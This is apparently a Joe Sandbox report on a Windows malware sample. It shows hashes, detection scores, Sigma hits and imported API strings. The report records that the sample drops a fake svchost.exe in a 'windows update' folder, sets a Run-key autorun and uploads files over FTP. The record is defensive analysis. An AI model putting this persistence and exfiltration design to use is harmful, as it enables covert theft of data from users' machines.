Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.FileRepMalware.7704.21109.exe

Overview

General Information

Sample name:SecuriteInfo.com.FileRepMalware.7704.21109.exe
Analysis ID:1521530
MD5:00a1b2ddc402ca4b20cc5f82f68092e6
SHA1:fb1e0c07a89b68d0670b2ebf548b6e076eaf8bdb
SHA256:06707c688782793a9f9e48388edc9439237a860f9e66019272a881a3aa5ea6ab
Tags:exe
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Drops PE files with benign system names
Extracts suspicious resources from PE file (packer detected)
Machine Learning detection for sample
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to upload files via FTP
Detected potential crypto function
Drops PE files
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SecuriteInfo.com.FileRepMalware.7704.21109.exe (PID: 7120 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exe" MD5: 00A1B2DDC402CA4B20CC5F82F68092E6)
    • svchost.exe (PID: 4896 cmdline: "C:\Users\user\AppData\Local\windows update\svchost.exe" MD5: D759329B5FA8220EFE1161BFF8B9C5EB)
  • svchost.exe (PID: 5708 cmdline: "C:\Users\user\AppData\Local\windows update\svchost.exe" MD5: D759329B5FA8220EFE1161BFF8B9C5EB)
  • svchost.exe (PID: 3020 cmdline: "C:\Users\user\AppData\Local\windows update\svchost.exe" MD5: D759329B5FA8220EFE1161BFF8B9C5EB)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exe, ProcessId: 7120, TargetFilename: C:\Users\user\AppData\Local\windows update\svchost.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Local\windows update\svchost.exe", CommandLine: "C:\Users\user\AppData\Local\windows update\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\windows update\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\windows update\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\windows update\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exe, ParentProcessId: 7120, ParentProcessName: SecuriteInfo.com.FileRepMalware.7704.21109.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\windows update\svchost.exe", ProcessId: 4896, ProcessName: svchost.exe
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\windows update\svchost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exe, ProcessId: 7120, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows update
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\windows update\svchost.exe", CommandLine: "C:\Users\user\AppData\Local\windows update\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\windows update\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\windows update\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\windows update\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exe, ParentProcessId: 7120, ParentProcessName: SecuriteInfo.com.FileRepMalware.7704.21109.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\windows update\svchost.exe", ProcessId: 4896, ProcessName: svchost.exe
Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Local\windows update\svchost.exe", CommandLine: "C:\Users\user\AppData\Local\windows update\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\windows update\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\windows update\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\windows update\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exe, ParentProcessId: 7120, ParentProcessName: SecuriteInfo.com.FileRepMalware.7704.21109.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\windows update\svchost.exe", ProcessId: 4896, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeAvira: detected
Source: C:\Users\user\AppData\Local\windows update\svchost.exeReversingLabs: Detection: 36%
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeReversingLabs: Detection: 60%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeJoe Sandbox ML: detected
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7704.21109.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
Source: SecuriteInfo.com.FileRepMalware.7704.21109.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\winapi\Move_V\Release\Move_V.pdb source: SecuriteInfo.com.FileRepMalware.7704.21109.exe
Source: Binary string: c:\winapi\Move_V\Release\Move_V.pdb] source: SecuriteInfo.com.FileRepMalware.7704.21109.exe
Source: Binary string: c:\winapi\V\Victim\Release\V.pdbaR source: SecuriteInfo.com.FileRepMalware.7704.21109.exe, svchost.exe.0.dr
Source: Binary string: c:\winapi\V\Victim\Release\V.pdb source: SecuriteInfo.com.FileRepMalware.7704.21109.exe, svchost.exe.0.dr
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 1_2_006724F0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?1_2_006724F0
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 1_2_006725B9 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$bas1_2_006725B9
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 1_2_00672687 ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FtpCreateDirectoryA,FtpCreateDirectoryA,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@s1_2_00672687
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 4_2_006724F0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,sprintf,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?4_2_006724F0
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 4_2_006725B9 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$bas4_2_006725B9
Source: C:\Users\user\AppData\Local\windows update\svchost.exeCode function: 4_2_00672687 ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,FindFirstFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,FindNextFileA,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V